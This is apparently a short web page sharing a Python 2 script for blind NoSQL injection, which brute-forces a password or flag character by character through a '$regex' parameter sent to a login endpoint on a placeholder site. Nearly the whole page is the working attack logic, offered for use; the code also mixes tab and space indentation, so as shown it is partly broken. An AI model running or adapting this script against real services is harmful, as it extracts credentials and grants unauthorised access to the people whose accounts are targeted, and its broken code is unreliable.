scripts

No-SQL-Blind Injection script !

Here is a little script to exploit nosql blind injections

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#!/usr/bin/env python2
import urllib2
import time
def checkIfGood(param):
    response = urllib2.urlopen("http://www.vulnerable-site.com/index.php?name=user&pass[$regex]=" + param).read()
	print "[^]Trying " + param
	time.sleep(0.1)
	if response.find("This is not a valid flag") == -1:
		return (0)
	return (1)
							
CHARSET = "0123456789azertyuiopqsdfghjklmwxcvbnAZERTYUIOPQSDFGHJKLMWXCVBN@-_."
def main():
	i = 0
	tmp = ""
	while i < len(CHARSET):
		tmp += CHARSET[i]
		if checkIfGood(tmp + '.' + '{' + str(21 - len(tmp)) + '}') == 1: # 21 = len(nb_chars)
			tmp = tmp[:-1]
		else:
			i = -1
		i = i + 1
																								
def check_nb_chars():
	i = 0
	while i < 100:
		if checkIfGood(".{" + str(i) + "}") == 0:
			print "OK : " + str(i)
		i = i + 1
#check_nb_chars()
main()